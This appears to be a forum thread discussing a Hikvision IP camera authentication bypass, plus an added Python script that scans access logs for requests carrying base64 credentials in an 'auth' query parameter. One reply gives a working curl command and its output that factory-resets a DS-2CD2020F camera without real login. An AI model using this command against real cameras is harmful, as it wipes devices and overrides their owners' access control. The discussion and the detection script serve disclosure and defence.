Thanks for publishing this. I looked at your findings and tested them against an unpatched Hikvision system I had on hand. You mentioned that "all other HikCGI calls" are vulnerable to the auth bypass, but did you actually test ones like the factoryReset one? From what I can see, only the ones that are normally called by GET appear vulnerable, and the rest (PUT ones like factoryReset) still come out as 401 Unauthorized. Perhaps I missed something? Nice find either way!
That is indeed working on my IPC DS-2CD2020F
$ curl -X PUT -v http://192.168.5.20/System/factoryDefault?auth=YWRtaW46MTEK
* Hostname was NOT found in DNS cache
* Trying 192.168.5.20...
* Connected to 192.168.5.20 (192.168.5.20) port 80 (#0)
> PUT /System/factoryDefault?auth=YWRtaW46MTEK HTTP/1.1
> User-Agent: curl/7.38.0
> Host: 192.168.5.20
> Accept: */*
>
< HTTP/1.1 200 OK
< Date: Sun, 17 Sep 2017 11:31:01 GMT
* Server App-webs/ is not blacklisted
< Server: App-webs/
< Connection: close
< Content-Length: 257
< Content-Type: application/xml
<
<?xml version="1.0" encoding="UTF-8"?>
<ResponseStatus version="1.0" xmlns="
Oops:The page you are visiting may have been deleted,renamed or inaccessible.">
<requestURL>/System/factoryDefault</requestURL>
<statusCode>7</statusCode>
<statusString>Reboot Required</statusString>
</ResponseStatus>
* Closing connection 0
$
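For defenders, one way to find requests of the shape shown in the transcript above in proxy or reverse-proxy access logs, written as an added example that is not part of the original thread. It flags any request whose `auth` query parameter base64-decodes to a `user:secret` pair; the combined log format, the function names and the sample lines are assumptions constructed for illustration.

```python
import base64
import binascii
import re
from urllib.parse import parse_qs, urlsplit

# Access-log line in combined log format (assumed; adjust for your proxy).
LINE_RE = re.compile(
    r'^(?P<src>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)

# Constructed sample lines, not captured traffic.
SAMPLE_LOG = """\
10.0.0.7 - - [17/Sep/2017:11:31:01 +0000] "PUT /System/factoryDefault?auth=YWRtaW46MTEK HTTP/1.1" 200 257
10.0.0.8 - - [17/Sep/2017:11:32:10 +0000] "GET /index.html HTTP/1.1" 200 1024
10.0.0.9 - - [17/Sep/2017:11:33:45 +0000] "GET /search?auth=token123 HTTP/1.1" 200 88
10.0.0.7 - - [17/Sep/2017:11:34:02 +0000] "PUT /System/factoryDefault HTTP/1.1" 401 0
"""

def credential_user(value):
    """Return the user name if value is base64 of 'user:secret', else None."""
    value = value.replace(" ", "+")  # parse_qs turns '+' into a space
    try:
        raw = base64.b64decode(value + "=" * (-len(value) % 4), validate=True)
        text = raw.decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    user, sep, _secret = text.partition(":")
    return user if sep and user and user.isprintable() else None

def find_auth_param_requests(log_text):
    """List requests whose 'auth' query parameter decodes to credentials."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        parts = urlsplit(m["target"])
        for value in parse_qs(parts.query).get("auth", []):
            user = credential_user(value)
            if user is not None:
                # Record the user only; never copy the secret into alerts.
                hits.append({"src": m["src"], "method": m["method"],
                             "path": parts.path, "user": user,
                             "status": int(m["status"])})
    return hits

if __name__ == "__main__":
    for hit in find_auth_param_requests(SAMPLE_LOG):
        print(hit)
```

A hit with a 2xx status on a state-changing method such as PUT deserves the first look, since the thread reports both 401 and 200 outcomes for such calls.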